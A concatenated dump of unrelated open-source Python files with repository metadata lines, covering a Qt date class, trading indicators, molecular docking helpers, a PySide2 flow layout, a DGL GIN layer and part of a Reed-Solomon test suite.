def getMilliseconds(self) -> int:
"""
Get Milliseconds from Date.
@return milliseconds
"""
return self.time_.msec()
getDate = getDay
# setDate = setDay
def setDate(self, date: Any) -> "Date":
"""
Set Date from any format.
@param date. Date to set
"""
year_ = self.date_.toString("yyyy")
month_ = self.date_.toString("MM")
day_ = str(date)
if len(day_) == 1:
day_ = "0" + day_
str_ = "%s-%s-%s" % (year_, month_, day_)
self.date_ = QtCore.QDate.fromString(str_, "yyyy-MM-dd")
return self
def addDays(self, days: int) -> "Date":
"""
Return result of adding a particular amount of days to current date.
@param d. Days to add (or subtract) to the given date
@return the newly computed date
"""
return Date(self.date_.addDays(days).toString("yyyy-MM-dd"))
def addMonths(self, months: int) -> "Date":
"""
Return result of adding given number of months to this date.
@param m. Months to add (or subtract) to the given date
@return the newly computed date
"""
return Date(self.date_.addMonths(months).toString("yyyy-MM-dd"))
def addYears(self, years: int) -> "Date":
"""
Return result of adding given number of years to this date.
@param y. Years to add (or subtract) to the given date
@return the newly computed date
"""
return Date(self.date_.addYears(years).toString("yyyy-MM-dd"))
@classmethod
def parse(cls, value: str) -> "Date":
"""Parse a ISO string into a date."""
return Date(value, "yyyy-MM-dd")
def __str__(self) -> str:
"""Support for str()."""
return self.toString()
def __repr__(self) -> str:
"""Support for str()."""
return self.toString()
def __lt__(self, other: Union[str, "Date"]) -> bool:
"""Support for comparisons."""
return str(self) < str(other)
def __le__(self, other: Union[str, "Date"]) -> bool:
"""Support for comparisons."""
return str(self) <= str(other)
def __ge__(self, other: Union[str, "Date"]) -> bool:
"""Support for comparisons."""
return str(self) >= str(other)
def __gt__(self, other: Union[str, "Date"]) -> bool:
"""Support for comparisons."""
return str(self) > str(other)
def __eq__(self, other: Any) -> bool:
"""Support for comparisons."""
return str(other) == str(self)
def __ne__(self, other: Any) -> bool:
"""Support for comparisons."""
return not self.__eq__(other)
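# Usage sketch (illustrative; assumes a working Qt/pineboolib environment):
#
#   d = Date("2021-03-05")                 # ISO string, default format "yyyy-MM-dd"
#   d.getYear(), d.getMonth(), d.getDay()  # -> 2021, 3, 5
#   d.addDays(10).toString("yyyy-MM-dd")   # -> "2021-03-15"
#   Date("05-03-2021")                     # dd-mm-yyyy input goes through date_dma_to_amd first
#   Date(2021, 3, 5) < Date(2021, 4, 1)    # comparisons use the ISO string form -> True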
| 28.828897 | 99 | 0.533369 |
b6620d3c76714b844c3efee2c49bbf54692694af | 7,535 | py | Python | Indicators/fisher_multi_pack_dw.py | Desil-sketch/Indicators-for-Jesse | ffe33a217002ea3034696fe38acfa72611d52b4f | ["MIT"] | 1 | 2021-12-08T06:34:48.000Z | 2021-12-08T06:34:48.000Z | Indicators/fisher_multi_pack_dw.py | Desil-sketch/Indicators-for-Jesse | ffe33a217002ea3034696fe38acfa72611d52b4f | ["MIT"] | null | null | null | Indicators/fisher_multi_pack_dw.py | Desil-sketch/Indicators-for-Jesse | ffe33a217002ea3034696fe38acfa72611d52b4f | ["MIT"] | 1 | 2021-11-04T17:40:19.000Z | 2021-11-04T17:40:19.000Z |
from jesse.helpers import get_candle_source, slice_candles, np_shift, same_length
import numpy as np
from numba import njit,jit
import talib
from typing import Union
from jesse.helpers import get_config
from collections import namedtuple
from numpy.lib.stride_tricks import as_strided
FISHMULT = namedtuple('FISHMULT',['osc', 'basiscolor', 'barcolor'])
'''
https://www.tradingview.com/script/hXp5irRI-Fisher-Multi-Pack-DW/#chart-view-comments
no compression, thresholds, or cmean
'''
def fishmulti(candles: np.ndarray, per: int= 13,smooth:bool=False,smper:int=1,otype:str="Fisher Transform",alpha:float=0.1, hth:float=0.95,lth:float=-0.95, source_type: str = "close", sequential: bool = False ) -> FISHMULT:
candles = slice_candles(candles, sequential)
source = get_candle_source(candles, source_type=source_type)
if otype == "Fisher Transform":
highval = same_length(candles,max_rolling1(source,per))
lowval = same_length(candles,min_rolling1(source,per))
fisher = fish(source,source,per,highval,lowval)
osc1 = fisher
elif otype == "Inverse Fisher RSI":
ifrsi = ifish_rsi(source,source,per,candles,alpha)
osc1 = ifrsi
elif otype == "Inverse Fisher Stochastic":
candles_high = candles[:, 3]
candles_low = candles[:, 4]
hh = talib.MAX(candles_high, per)
ll = talib.MIN(candles_low, per)
stoch1 = 100 * (source - ll) / (hh - ll)
STOCH = same_length(candles,stoch1)
ifstoch = ifish_stoch(source,source,per,candles,alpha,STOCH)
osc1 = ifstoch
else:
rollwin = talib.SMA(source,per)
CCI = pine_cci(source,per,rollwin)
ifcci = ifish_cci(source,source,per,candles,alpha,CCI)
osc1 = ifcci
osc2 = pine_ema(source,osc1,smper) if smooth else pine_ema(source,osc1,1)
osc = osc2
basiscolor, barcolor = barcolor1(source,osc,hth,lth)
if sequential:
return FISHMULT(osc,basiscolor,barcolor)
else:
return FISHMULT(osc[-1],basiscolor[-1],barcolor[-1])
@njit
def barcolor1(source,osc,hth,lth):
barcolor = np.full_like(source,0)
basiscolor = np.full_like(source,0)
for i in range(source.shape[0]):
if (osc[i] > 0) and (osc[i] >= osc[i-1]) and (osc[i] >= hth):
barcolor[i] = 2
elif (osc[i] >0) and (osc[i] > osc[i-1]) and (osc[i] < hth):
barcolor[i] = 1.5
elif (osc[i] > 0) and (osc[i] <osc[i-1]):
barcolor[i] = 1
elif (osc[i] < 0) and (osc[i] <= osc[i-1]) and (osc[i] <= lth):
barcolor[i] = -2
elif (osc[i] <0) and (osc[i] < osc[i-1]) and (osc[i] > lth):
barcolor[i] = -1.5
elif (osc[i] <0) and (osc[i] > osc[i-1]):
barcolor[i] = -1
else:
barcolor[i] = 0
if osc[i] > 0:
basiscolor[i] = 1
elif osc[i] < 0:
basiscolor[i] = -1
else:
basiscolor[i] = 0
return basiscolor, barcolor
@njit
def pine_cci(source,per,rollwin):
mamean = np.full_like(source,0)
cci = np.full_like(source,0)
dev = np.full_like(source,0)
for i in range(source.shape[0]):
sum1 = 0.0
val = 0.0
for j in range(per):
val = source[i-j]
sum1 = sum1 + np.abs(val - rollwin[i])
dev[i] = sum1/per
cci[i] = (source[i] - rollwin[i]) / (0.015 * dev[i])
return cci
@njit
def pine_rsi(source,length):
u = np.full_like(source, 0)
d = np.full_like(source, 0)
rs = np.full_like(source, 0)
res = np.full_like(source, 0)
alpha = 1 / length
sumation1 = np.full_like(source, 1)
sumation2 = np.full_like(source, 1)
for i in range(source.shape[0]):
u[i] = np.maximum((source[i] - source[i-1]),0)
d[i] = np.maximum((source[i-1] - source[i]), 0)
sumation1[i] = alpha * u[i] + (1 - alpha) * (sumation1[i-1])
sumation2[i] = alpha * d[i] + (1 - alpha) * (sumation2[i-1])
rs[i] = sumation1[i]/sumation2[i]
res[i] = 100 - 100 / ( 1 + rs[i])
return res
@jit(nopython=True, error_model="numpy")
def fish(source,x,t,highval,lowval):
val1 = np.full_like(source,0)
val2 = np.full_like(source,0)
fish = np.full_like(source,0)
for i in range(t,source.shape[0]):
# val1[i-1] = 0 if np.isnan(val1[i-1]) else val1[i-1]
val1[i] = 0.66 * ((x[i] - lowval[i])/np.maximum((highval[i] - lowval[i]),0.001)-0.5) + 0.67*val1[i-1]
if val1[i] > 0.99:
val2[i] = 0.999
elif val1[i] < -0.99:
val2[i] = -0.999
else:
val2[i] = val1[i]
fish[i] = 0.5 * np.log((1+val2[i])/np.maximum(1-val2[i],0.001)) + 0.5*fish[i-1]
return fish
@njit
def ifish_rsi(source,x,t,candles,alpha):
val = np.full_like(source,0)
rsi = np.full_like(source,0)
wval1 = np.full_like(source,0.0)
wval2 = np.full_like(source,0.0)
ifish = np.full_like(source,0)
for i in range(source.shape[0]):
rsi = pine_rsi(x,t)
val[i] = alpha*(rsi[i]-50)
wval1 = pine_wma(source,val,t)
wval2 = np.concatenate((np.full((candles.shape[0] - wval1.shape[0]), np.nan), wval1))
ifish[i] = (np.exp(2*wval2[i]) - 1)/(np.exp(2*wval2[i])+1)
return ifish
@njit
def ifish_stoch(source,x,t,candles,alpha,stoch):
val = np.full_like(source,0)
wval1 = np.full_like(source,0.0)
wval2 = np.full_like(source,0.0)
ifish = np.full_like(source,0)
for i in range(source.shape[0]):
val[i] = alpha*(stoch[i]-50)
wval1 = pine_wma(source,val,t)
wval2 = np.concatenate((np.full((candles.shape[0] - wval1.shape[0]), np.nan), wval1))
ifish[i] = (np.exp(2*wval2[i]) - 1)/(np.exp(2*wval2[i])+1)
return ifish
@njit
def ifish_cci(source,x,t,candles,alpha,CCI):
val = np.full_like(source,0)
wval1 = np.full_like(source,0.0)
wval2 = np.full_like(source,0.0)
ifish = np.full_like(source,0)
for i in range(source.shape[0]):
val[i] = alpha*(CCI[i])
wval1 = pine_wma(source,val,t)
wval2 = np.concatenate((np.full((candles.shape[0] - wval1.shape[0]), np.nan), wval1))
ifish[i] = (np.exp(2*wval2[i]) - 1)/(np.exp(2*wval2[i])+1)
return ifish
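# Note: the inverse Fisher step used in the three functions above is algebraically
# identical to the hyperbolic tangent, i.e. (exp(2*w) - 1) / (exp(2*w) + 1) == np.tanh(w);
# the explicit form is kept to mirror the original TradingView script.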
@njit
def pine_wma(source1,source2,length):
res = np.full_like(source1,length)
for i in range(source1.shape[0]):
weight = 0.0
norm = 0.0
sum1 = 0.0
for j in range(length):
weight = (length - j)*length
norm = norm + weight
sum1 = sum1 + source2[i-j] * weight
res[i] = sum1/norm
return res
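# Note: the constant factor `length` in `weight` cancels when dividing by `norm`,
# so this is equivalent to a standard linearly-weighted moving average over the
# last `length` samples of source2.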
@njit
def pine_ema(source1, source2, length):
alpha = 2 / (length + 1)
sum1 = np.full_like(source1,0)
for i in range(10,source1.shape[0]):
sum1[i-1] = 0 if np.isnan(sum1[i-1]) else sum1[i-1]
sum1[i] = alpha * source2[i] + (1 - alpha) * sum1[i-1]
return sum1
def max_rolling1(a, window,axis =1):
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
rolling = np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
return np.max(rolling,axis=axis)
def min_rolling1(a, window,axis =1):
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
rolling = np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
return np.min(rolling,axis=axis)
| 37.118227 | 227 | 0.583809 |
484b2c44321272bf21c278413f4e47597e29f872 | 4,627 | py | Python | AlGDock/Aux_func.py | xinliu0609/AlGDock | 0795a9cfea690e1d287b8eb2be5ed8586f61b2d3 | ["MIT"] | null | null | null | AlGDock/Aux_func.py | xinliu0609/AlGDock | 0795a9cfea690e1d287b8eb2be5ed8586f61b2d3 | ["MIT"] | null | null | null | AlGDock/Aux_func.py | xinliu0609/AlGDock | 0795a9cfea690e1d287b8eb2be5ed8586f61b2d3 | ["MIT"] | null | null | null |
import os #Miscellaneous operating system interfaces
from os.path import abspath
from os.path import exists
from os.path import isfile
from os.path import join
import cPickle as pickle
import gzip
import copy
import time
import numpy as np
import MMTK
import MMTK.Units
from MMTK.ParticleProperties import Configuration
import Scientific
from Scientific_vector import Vector # @UnresolvedImport
import AlGDock as a
import pymbar.timeseries
########################
# Auxilliary functions #
########################
def random_rotate():
"""
Return a random rotation matrix
"""
u = np.random.uniform(size=3)
# Random quaternion
q = np.array([np.sqrt(1-u[0])*np.sin(2*np.pi*u[1]),
np.sqrt(1-u[0])*np.cos(2*np.pi*u[1]),
np.sqrt(u[0])*np.sin(2*np.pi*u[2]),
np.sqrt(u[0])*np.cos(2*np.pi*u[2])])
# Convert the quaternion into a rotation matrix
rotMat = np.array([[q[0]*q[0] + q[1]*q[1] - q[2]*q[2] - q[3]*q[3],
2*q[1]*q[2] - 2*q[0]*q[3],
2*q[1]*q[3] + 2*q[0]*q[2]],
[2*q[1]*q[2] + 2*q[0]*q[3],
q[0]*q[0] - q[1]*q[1] + q[2]*q[2] - q[3]*q[3],
2*q[2]*q[3] - 2*q[0]*q[1]],
[2*q[1]*q[3] - 2*q[0]*q[2],
2*q[2]*q[3] + 2*q[0]*q[1],
q[0]*q[0] - q[1]*q[1] - q[2]*q[2] + q[3]*q[3]]])
return rotMat
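# Quick sanity check (illustrative): a rotation matrix built from a unit
# quaternion should be orthogonal with determinant +1.
#
#   R = random_rotate()
#   assert np.allclose(R.dot(R.T), np.eye(3))
#   assert np.isclose(np.linalg.det(R), 1.0)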
# def choice(N, weights=None):
# """
# Weighted random number selection of N values
# """
# weights /= np.sum(weights)
# cumweights = np.cumsum(weights)
# beginIndicies = np.zeros(N, dtype=int)
# randVals = np.random.uniform(size=N)
#
# for (bI_idx,randVal) in zip(range(N),randVals):
# beginIndicies[bI_idx] = sum(cumweights < randVal)
# beginIndicies.sort()
# return beginIndicies
def merge_dictionaries(dicts, required_consistency=[], print_inconsistent=False):
"""
Merges a list of dictionaries, giving priority to items in descending order.
Items in the required_consistency list must be consistent with one another.
"""
merged = {}
for a in range(len(dicts)): # Loop over all dictionaries,
# giving priority to the first
if not isinstance(dicts[a],dict):
continue
for key in dicts[a].keys():
if dicts[a][key] is None:
if not key in merged.keys():
merged[key] = None
elif isinstance(dicts[a][key],dict):
merged[key] = merge_dictionaries(
[dicts[n][key] for n in range(len(dicts)) if key in dicts[n].keys()],
required_consistency=required_consistency)
else:
# Check for consistency with other dictionaries
for b in (range(a) + range(a+1,len(dicts))):
if isinstance(dicts[b],dict) and (key in dicts[b].keys()) and (dicts[b][key] is not None):
if (isinstance(dicts[b][key],np.ndarray)):
inconsistent_items = (dicts[b][key]!=dicts[a][key]).any()
else:
inconsistent_items = (dicts[b][key]!=dicts[a][key])
if inconsistent_items:
if print_inconsistent:
print 'Dictionary items are inconsistent:'
print dicts[a][key]
print dicts[b][key]
if key in required_consistency:
raise Exception('Items must be consistent!')
merged[key] = dicts[a][key]
return merged
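# Worked example (illustrative):
#
#   merge_dictionaries([{'a': 1, 'c': None}, {'b': 2}])
#   -> {'a': 1, 'c': None, 'b': 2}
#
#   Nested dictionaries are merged recursively:
#   merge_dictionaries([{'x': {'p': 1}}, {'x': {'q': 2}}])
#   -> {'x': {'p': 1, 'q': 2}}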
def convert_dictionary_relpath(d, relpath_o=None, relpath_n=None):
"""
Converts all file names in a dictionary from one relative path to another.
If relpath_o is None, nothing is joined to the original path.
If relpath_n is None, an absolute path is used.
"""
converted = {}
for key in d.keys():
if d[key] is None:
pass
elif isinstance(d[key],dict):
converted[key] = convert_dictionary_relpath(d[key],
relpath_o = relpath_o, relpath_n = relpath_n)
elif isinstance(d[key],str):
if relpath_o is not None:
p = abspath(join(relpath_o,d[key]))
else:
p = abspath(d[key])
if exists(p): # Only save file names for existent paths
if relpath_n is not None:
converted[key] = os.path.relpath(p,relpath_n)
else:
converted[key] = p
return converted
def HMStime(s):
"""
Given the time in seconds, an appropriately formatted string.
"""
if s<60.:
return '%.3f s'%s
elif s<3600.:
return '%d:%.3f'%(int(s/60%60),s%60)
else:
return '%d:%d:%.3f'%(int(s/3600),int(s/60%60),s%60)
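# Examples (derived from the three branches above):
#   HMStime(12.3456) -> '12.346 s'
#   HMStime(135.2)   -> '2:15.200'
#   HMStime(3725.0)  -> '1:2:5.000'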
class NullDevice():
"""
A device to suppress output
"""
def write(self, s):
pass
| 31.910345 | 100 | 0.582019 |
57e54155587215186454f9b781d8f9aa07fd3127 | 5,386 | py | Python | venv/Lib/site-packages/PySide2/examples/widgets/layouts/flowlayout.py | TEDxVienna/continuum | 85cefbc274fc59e2059c313bc0d3b9b93a34ba6d | ["MIT"] | null | null | null | venv/Lib/site-packages/PySide2/examples/widgets/layouts/flowlayout.py | TEDxVienna/continuum | 85cefbc274fc59e2059c313bc0d3b9b93a34ba6d | ["MIT"] | null | null | null | venv/Lib/site-packages/PySide2/examples/widgets/layouts/flowlayout.py | TEDxVienna/continuum | 85cefbc274fc59e2059c313bc0d3b9b93a34ba6d | ["MIT"] | null | null | null |
############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2016 The Qt Company Ltd.
## Contact: http://www.qt.io/licensing/
##
## This file is part of the Qt for Python examples of the Qt Toolkit.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of The Qt Company Ltd nor the names of its
## contributors may be used to endorse or promote products derived
## from this software without specific prior written permission.
##
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
## $QT_END_LICENSE$
##
#############################################################################
"""PySide2 port of the widgets/layouts/flowlayout example from Qt v5.x"""
from PySide2 import QtCore, QtGui, QtWidgets
class Window(QtWidgets.QWidget):
def __init__(self):
super(Window, self).__init__()
flowLayout = FlowLayout()
flowLayout.addWidget(QtWidgets.QPushButton("Short"))
flowLayout.addWidget(QtWidgets.QPushButton("Longer"))
flowLayout.addWidget(QtWidgets.QPushButton("Different text"))
flowLayout.addWidget(QtWidgets.QPushButton("More text"))
flowLayout.addWidget(QtWidgets.QPushButton("Even longer button text"))
self.setLayout(flowLayout)
self.setWindowTitle("Flow Layout")
class FlowLayout(QtWidgets.QLayout):
def __init__(self, parent=None, margin=0, spacing=-1):
super(FlowLayout, self).__init__(parent)
if parent is not None:
self.setMargin(margin)
self.setSpacing(spacing)
self.itemList = []
def __del__(self):
item = self.takeAt(0)
while item:
item = self.takeAt(0)
def addItem(self, item):
self.itemList.append(item)
def count(self):
return len(self.itemList)
def itemAt(self, index):
if index >= 0 and index < len(self.itemList):
return self.itemList[index]
return None
def takeAt(self, index):
if index >= 0 and index < len(self.itemList):
return self.itemList.pop(index)
return None
def expandingDirections(self):
return QtCore.Qt.Orientations(QtCore.Qt.Orientation(0))
def hasHeightForWidth(self):
return True
def heightForWidth(self, width):
height = self.doLayout(QtCore.QRect(0, 0, width, 0), True)
return height
def setGeometry(self, rect):
super(FlowLayout, self).setGeometry(rect)
self.doLayout(rect, False)
def sizeHint(self):
return self.minimumSize()
def minimumSize(self):
size = QtCore.QSize()
for item in self.itemList:
size = size.expandedTo(item.minimumSize())
size += QtCore.QSize(2 * self.contentsMargins().top(), 2 * self.contentsMargins().top())
return size
def doLayout(self, rect, testOnly):
x = rect.x()
y = rect.y()
lineHeight = 0
for item in self.itemList:
wid = item.widget()
spaceX = self.spacing() + wid.style().layoutSpacing(QtWidgets.QSizePolicy.PushButton, QtWidgets.QSizePolicy.PushButton, QtCore.Qt.Horizontal)
spaceY = self.spacing() + wid.style().layoutSpacing(QtWidgets.QSizePolicy.PushButton, QtWidgets.QSizePolicy.PushButton, QtCore.Qt.Vertical)
nextX = x + item.sizeHint().width() + spaceX
if nextX - spaceX > rect.right() and lineHeight > 0:
x = rect.x()
y = y + lineHeight + spaceY
nextX = x + item.sizeHint().width() + spaceX
lineHeight = 0
if not testOnly:
item.setGeometry(QtCore.QRect(QtCore.QPoint(x, y), item.sizeHint()))
x = nextX
lineHeight = max(lineHeight, item.sizeHint().height())
return y + lineHeight - rect.y()
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
mainWin = Window()
mainWin.show()
sys.exit(app.exec_())
| 34.525641 | 153 | 0.644077 |
99f2e5520656f5514b4e62a0faf7bb104b052dc9 | 4,458 | py | Python | python/dgl/nn/pytorch/conv/ginconv.py | joshcarty/dgl | 4464b9734c1061bd84325a54883c5046031def37 | ["Apache-2.0"] | 4 | 2018-12-25T14:59:08.000Z | 2021-07-02T12:36:40.000Z | python/dgl/nn/pytorch/conv/ginconv.py | xyanAI/dgl | 36daf66f6216bad4d30651311bcb87aa45dd33d5 | ["Apache-2.0"] | 1 | 2019-02-06T02:02:41.000Z | 2019-02-06T20:22:32.000Z | python/dgl/nn/pytorch/conv/ginconv.py | xyanAI/dgl | 36daf66f6216bad4d30651311bcb87aa45dd33d5 | ["Apache-2.0"] | 4 | 2020-12-26T10:39:36.000Z | 2020-12-26T12:38:52.000Z |
"""Torch Module for Graph Isomorphism Network layer"""
# pylint: disable= no-member, arguments-differ, invalid-name
import torch as th
from torch import nn
from .... import function as fn
from ....utils import expand_as_pair
class GINConv(nn.Module):
r"""
Description
-----------
Graph Isomorphism Network layer from paper `How Powerful are Graph
Neural Networks? <https://arxiv.org/pdf/1810.00826.pdf>`__.
.. math::
h_i^{(l+1)} = f_\Theta \left((1 + \epsilon) h_i^{l} +
\mathrm{aggregate}\left(\left\{h_j^{l}, j\in\mathcal{N}(i)
\right\}\right)\right)
Parameters
----------
apply_func : callable activation function/layer or None
If not None, apply this function to the updated node feature,
the :math:`f_\Theta` in the formula.
aggregator_type : str
Aggregator type to use (``sum``, ``max`` or ``mean``).
init_eps : float, optional
Initial :math:`\epsilon` value, default: ``0``.
learn_eps : bool, optional
If True, :math:`\epsilon` will be a learnable parameter. Default: ``False``.
Example
-------
>>> import dgl
>>> import numpy as np
>>> import torch as th
>>> from dgl.nn import GINConv
>>>
>>> g = dgl.graph(([0,1,2,3,2,5], [1,2,3,4,0,3]))
>>> feat = th.ones(6, 10)
>>> lin = th.nn.Linear(10, 10)
>>> conv = GINConv(lin, 'max')
>>> res = conv(g, feat)
>>> res
tensor([[-0.4821, 0.0207, -0.7665, 0.5721, -0.4682, -0.2134, -0.5236, 1.2855,
0.8843, -0.8764],
[-0.4821, 0.0207, -0.7665, 0.5721, -0.4682, -0.2134, -0.5236, 1.2855,
0.8843, -0.8764],
[-0.4821, 0.0207, -0.7665, 0.5721, -0.4682, -0.2134, -0.5236, 1.2855,
0.8843, -0.8764],
[-0.4821, 0.0207, -0.7665, 0.5721, -0.4682, -0.2134, -0.5236, 1.2855,
0.8843, -0.8764],
[-0.4821, 0.0207, -0.7665, 0.5721, -0.4682, -0.2134, -0.5236, 1.2855,
0.8843, -0.8764],
[-0.1804, 0.0758, -0.5159, 0.3569, -0.1408, -0.1395, -0.2387, 0.7773,
0.5266, -0.4465]], grad_fn=<AddmmBackward>)
"""
def __init__(self,
apply_func,
aggregator_type,
init_eps=0,
learn_eps=False):
super(GINConv, self).__init__()
self.apply_func = apply_func
self._aggregator_type = aggregator_type
if aggregator_type == 'sum':
self._reducer = fn.sum
elif aggregator_type == 'max':
self._reducer = fn.max
elif aggregator_type == 'mean':
self._reducer = fn.mean
else:
raise KeyError('Aggregator type {} not recognized.'.format(aggregator_type))
# to specify whether eps is trainable or not.
if learn_eps:
self.eps = th.nn.Parameter(th.FloatTensor([init_eps]))
else:
self.register_buffer('eps', th.FloatTensor([init_eps]))
def forward(self, graph, feat):
r"""
Description
-----------
Compute Graph Isomorphism Network layer.
Parameters
----------
graph : DGLGraph
The graph.
feat : torch.Tensor or pair of torch.Tensor
If a torch.Tensor is given, the input feature of shape :math:`(N, D_{in})` where
:math:`D_{in}` is size of input feature, :math:`N` is the number of nodes.
If a pair of torch.Tensor is given, the pair must contain two tensors of shape
:math:`(N_{in}, D_{in})` and :math:`(N_{out}, D_{in})`.
If ``apply_func`` is not None, :math:`D_{in}` should
fit the input dimensionality requirement of ``apply_func``.
Returns
-------
torch.Tensor
The output feature of shape :math:`(N, D_{out})` where
:math:`D_{out}` is the output dimensionality of ``apply_func``.
If ``apply_func`` is None, :math:`D_{out}` should be the same
as input dimensionality.
"""
with graph.local_scope():
feat_src, feat_dst = expand_as_pair(feat, graph)
graph.srcdata['h'] = feat_src
graph.update_all(fn.copy_u('h', 'm'), self._reducer('m', 'neigh'))
rst = (1 + self.eps) * feat_dst + graph.dstdata['neigh']
if self.apply_func is not None:
rst = self.apply_func(rst)
return rst
| 37.779661 | 92 | 0.545312 |
b2bbd2807283aec2250532eb252310eddd714bb7 | 24,585 | py | Python | pyFileFixity/lib/reedsolomon/tests/test_creedsolo.py | lrq3000/rfigc | a68021a506fee1aabea6b2fb88e685de347d900f | ["MIT"] | 82 | 2015-03-20T18:43:37.000Z | 2022-03-05T13:23:12.000Z | pyFileFixity/lib/reedsolomon/tests/test_creedsolo.py | lrq3000/rfigc | a68021a506fee1aabea6b2fb88e685de347d900f | ["MIT"] | 9 | 2015-12-05T17:32:14.000Z | 2021-06-11T15:51:38.000Z | pyFileFixity/lib/reedsolomon/tests/test_creedsolo.py | hadi-f90/pyFileFixity | 2cb3dd6225a6b062a98fa2d61c4a0a29d8010428 | ["MIT"] | 10 | 2015-12-13T18:51:44.000Z | 2022-02-21T10:50:28.000Z |
# To use this script easily (starting with Python 2.7), just cd to the parent folder and type the following command:
# python -m unittest discover tests
from __future__ import print_function
import unittest
import sys
from random import sample
import itertools
try:
from itertools import izip
except ImportError: #python3.x
izip = zip
# Skip this whole module test if running under PyPy (incompatible with Cython)
try:
import __pypy__
# Empty test unit to show the reason of skipping
class TestMissingDependency(unittest.TestCase):
@unittest.skip('Missing dependency - Cython is incompatible with PyPy')
def test_fail():
pass
# Else we're not under PyPy, we can run the test
except ImportError:
__pypy__ = None
from creedsolo import *
try:
bytearray
except NameError:
from creedsolo import bytearray
try: # compatibility with Python 3+
xrange
except NameError:
xrange = range
class cTestReedSolomon(unittest.TestCase):
def test_simple(self):
rs = RSCodec(10)
msg = bytearray("hello world " * 10, "latin1")
enc = rs.encode(msg)
dec = rs.decode(enc)
self.assertEqual(dec, msg)
def test_correction(self):
rs = RSCodec(10)
msg = bytearray("hello world " * 10, "latin1")
enc = rs.encode(msg)
self.assertEqual(rs.decode(enc), msg)
for i in [27, -3, -9, 7, 0]:
enc[i] = 99
self.assertEqual(rs.decode(enc), msg)
enc[82] = 99
self.assertRaises(ReedSolomonError, rs.decode, enc)
def test_long(self):
rs = RSCodec(10)
msg = bytearray("a" * 10000, "latin1")
enc = rs.encode(msg)
dec = rs.decode(enc)
self.assertEqual(dec, msg)
enc[177] = 99
enc[2212] = 88
dec2 = rs.decode(enc)
self.assertEqual(dec2, msg)
def test_prim_fcr_basic(self):
nn = 30
kk = 18
tt = nn - kk
rs = RSCodec(tt, fcr=120, prim=0x187)
hexencmsg = '00faa123555555c000000354064432c02800fe97c434e1ff5365' \
'cf8fafe4'
strf = str if sys.version_info[0] >= 3 else unicode
encmsg = bytearray.fromhex(strf(hexencmsg))
decmsg = encmsg[:kk]
tem = rs.encode(decmsg)
self.assertEqual(encmsg, tem, msg="encoded does not match expected")
tdm = rs.decode(tem)
self.assertEqual(tdm, decmsg, msg="decoded does not match original")
tem1 = bytearray(tem) # clone a copy
# encoding and decoding intact message seem OK, so test errors
numerrs = tt >> 1 # inject tt/2 errors (expected to recover fully)
for i in sample(range(nn), numerrs): # inject errors in random places
tem1[i] ^= 0xff # flip all 8 bits
tdm = rs.decode(tem1)
self.assertEqual(tdm, decmsg,
msg="decoded with errors does not match original")
tem1 = bytearray(tem) # clone another copy
numerrs += 1 # inject tt/2 + 1 errors (expected to fail and detect it)
for i in sample(range(nn), numerrs): # inject errors in random places
tem1[i] ^= 0xff # flip all 8 bits
# if this fails, it means excessive errors not detected
self.assertRaises(ReedSolomonError, rs.decode, tem1)
def test_prim_fcr_long(self):
nn = 48
kk = 34
tt = nn - kk
rs = RSCodec(tt, fcr=120, prim=0x187)
hexencmsg = '08faa123555555c000000354064432c0280e1b4d090cfc04887400' \
'000003500000000e1985ff9c6b33066ca9f43d12e8'
strf = str if sys.version_info[0] >= 3 else unicode
encmsg = bytearray.fromhex(strf(hexencmsg))
decmsg = encmsg[:kk]
tem = rs.encode(decmsg)
self.assertEqual(encmsg, tem, msg="encoded does not match expected")
tdm = rs.decode(tem)
self.assertEqual(tdm, decmsg,
msg="decoded does not match original")
tem1 = bytearray(tem)
numerrs = tt >> 1
for i in sample(range(nn), numerrs):
tem1[i] ^= 0xff
tdm = rs.decode(tem1)
self.assertEqual(tdm, decmsg,
msg="decoded with errors does not match original")
tem1 = bytearray(tem)
numerrs += 1
for i in sample(range(nn), numerrs):
tem1[i] ^= 0xff
self.assertRaises(ReedSolomonError, rs.decode, tem1)
def test_generator_poly(self):
'''Test if generator poly finder is working correctly and if the all generators poly finder does output the same result'''
n = 11
k = 3
# Base 2 test
fcr = 120
generator = 2
prim = 0x11d
init_tables(generator=generator, prim=prim)
g = rs_generator_poly_all(n, fcr=fcr, generator=generator)
self.assertEqual( list(g[n-k]) , list(rs_generator_poly(n-k,fcr=fcr, generator=generator)) )
self.assertEqual( list(g[n-k]) , [1, 106, 9, 105, 86, 5, 166, 76, 9] )
# Base 3 test
fcr = 0
generator = 3
prim = 0x11b
init_tables(generator=generator, prim=prim)
g = rs_generator_poly_all(n, fcr=fcr, generator=generator)
self.assertEqual( list(g[n-k]) , list(rs_generator_poly(n-k,fcr=fcr, generator=generator)) )
